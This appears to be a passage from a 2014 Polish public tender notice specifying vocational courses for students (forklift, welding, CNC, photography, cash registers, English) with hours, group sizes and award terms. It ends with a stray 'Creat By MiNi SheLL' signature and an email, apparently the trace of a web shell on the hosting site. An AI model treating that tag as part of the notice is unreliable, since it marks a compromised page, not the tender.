<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ 4:  USŁUGA   PRZEPROWADZENIA  KURSU KIEROWCY  OPERATORA WÓZKA JEZDNIOWEGO  W  TYM BEZPIECZNA WYMIANA BUTLI ,  KURSU SPAWANIA MAG 135, KURSU OBSŁUGI I PROGRAMOWANIA OBRABIAREK CNC..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.KURS KIEROWCY OPERATORA WÓZKA JEZDNIOWEGO, W TYM BEZPIECZNA WYMIANA BUTLI Maksymalna liczba uczestników kursu wynosić będzie 38 osób. Zamawiający wymaga przeprowadzenia kursu w podziale na trzy grupy. Podział dostosować do  potrzeb i możliwości uczestników przedmiotowego kursu.
Minimalna liczba godzin kursu  wynosić będzie:  zajęcia teoretyczne  44 godziny (godzina trwać będzie  45 minut); zajęcia praktyczne : 15 godzin (godzina trwać będzie. 60 minut.; bezpieczna wymiana butli:8 godzin (godzina trwać będzie  60 minut).Celem szkolenia jest zdobycie przez uczestników szkolenia teoretycznej wiedzy i praktycznych umiejętności w zakresie manewrowania i obsługi technicznej wózków jezdniowych podnośnikowych z wyłączeniem specjalizowanych oraz nabycie umiejętności z zakresu bezpiecznej wymiany butli gazowych w wózkach wyposażonych w te urządzenia. Osoby zakwalifikowane do udziału w szkoleniu w pierwszej kolejności powinny zostać skierowane na badania celem stwierdzenia istnienia lub braku przeciwwskazań zdrowotnych do zawodu kierowcy operatora wózka jezdniowego. Kurs skierowany jest do uczniów kształcących się w zawodach: rolnik, technik architektury krajobrazu, technik budownictwa, technik logistyk, technik rolnik, mechanik pojazdów samochodowych, blacharz samochodowy, elektromechanik pojazdów samochodowych, technik mechatronik, monter zabudowy i robót wykończeniowych w budownictwie, piekarz, stolarz, technik pojazdów samochodowych, technik spedytor.B.KURS  SPAWANIA MAG 135 (moduł pierwszy) kurs spawania blach i rur   spoinami pachwinowymi.Maksymalna liczba uczestników kursu wynosić będzie 16 osób.Minimalna liczba  godzin zajęć teoretycznych wynosić będzie  26 godzin (godzina trwać będzie 45 minut).Minimalna liczba  godzin zajęć praktycznych wynosić będzie 120 godzin (godzina trwać będzie 60 minut). Zamawiający wymaga by zajęcia teoretyczne przeprowadzono w podziale  na dwie grupy. Podział  na grupy należy dostosować do potrzeb i możliwości uczestników kursu. Na zajęciach praktycznych Wykonawca winien  zapewnić samodzielne stanowisko szkoleniowe dla każdego kursanta.Kurs skierowany jest do uczniów kształcących się w zawodach: technik budownictwa, mechanik pojazdów samochodowych, blacharz samochodowy, technik mechatronik, technik pojazdów samochodowych,  monter sieci, instalacji i urządzeń sanitarnych, ślusarz, monter - mechatronik.C.	KURS OBSŁUGI I PROGRAMOWANIA OBRABIAREK CNC.
Kurs obejmuje zajęcia praktyczne i teoretyczne. Maksymalna liczba uczestników kursu wynosić będzie: 20 osób. Są to uczniowie kształcący się w zawodach: technik mechatronik, blacharz samochodowy, mechanik pojazdów samochodowych, ślusarz, technik pojazdów samochodowych, monter - mechatronik. Czas trwania kursu: 80 godzin na osobę. Zajęcia teoretyczne trwać będą  14 godzin (godzina zajęć:45 minut).  Zajęcia praktyczne trwać będą 66 godzin (godzina zajęć praktycznych wynosi 60 minut).Cel szkolenia: zdobycie przez uczestników umiejętności w zakresie podstaw obsługi i programowania obrabiarek CNC..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ 5:  - USŁUGA PRZEPROWADZENIA KURSU FOTOGRAFII CYFROWEJ I STOPNIA,KURSU OBSŁUGI KAS FISKALNYCH, KURSU JĘZYKA ANGIELSKIEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A. KURS FOTOGRAFII  CYFROWEJ - I STOPNIA. Maksymalna liczba uczestników kursu wynosić będzie: 21 osób. Zajęcia odbywać się będą w podziale na trzy grupy. Kurs skierowany jest dla uczniów szkół ponadgimnazjalnych kształcących się w zawodach: technik organizacji reklamy, technik architektury krajobrazu. Maksymalna liczba godzin kursu wynosić będzie 32 godziny. Zajęcia teoretyczne trwać będą  7 godzin (godzina 45 minut), zajęcia praktyczne trwać będą 25 godzin (godzina wynosić będzie 60 minut). Cel kursu kompleksowe przygotowanie uczestników do świadomego fotografowania oraz obróbki zdjęć. B.KURS OBSŁUGI KAS FISKALNYCH.  Maksymalna liczba uczestników kursu: 5 osób. Wykonawca przeprowadzi kurs w podziale na dwie grupy. Kurs skierowany jest dla uczniów szkół ponadgimnazjalnych kształcących się w zawodzie: kucharz,  technik hotelarstwa, technik kucharz, technik żywienia i gospodarstwa domowego, technik żywienia i usług gastronomicznych, technik obsługi turystycznej, piekarz. Minimalna liczba godzin kursu to 20 godzin. Zajęcia teoretyczne trwać będą 6 godzin (godzina 45 minut), zajęcia praktyczne trwać będą 14 godzin (godzina zajęć wynosić będzie  60 minut). Wykonawca zapewnia: materiały szkoleniowe oraz odpowiedni sprzęt do realizacji kursu. C. KURS  JĘZYKA  ANGIELSKIEGO. Maksymalna liczba uczestników wynosić będzie: 24 osoby. Szkolenie odbędzie się w ramach trzech grup. Kurs skierowany jest dla uczniów szkół ponadgimnazjalnych kształcących się w zawodach: technik budownictwa, technik pojazdów samochodowych, elektryk, technik mechatronik, technik geodeta, technik logistyk, technik ekonomista, technik organizacji reklamy, technik obsługi turystycznej, technik informatyk. Minimalna liczba godzin kursu wynosić będzie 40 godzin. Godzina trwać będzie 45 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com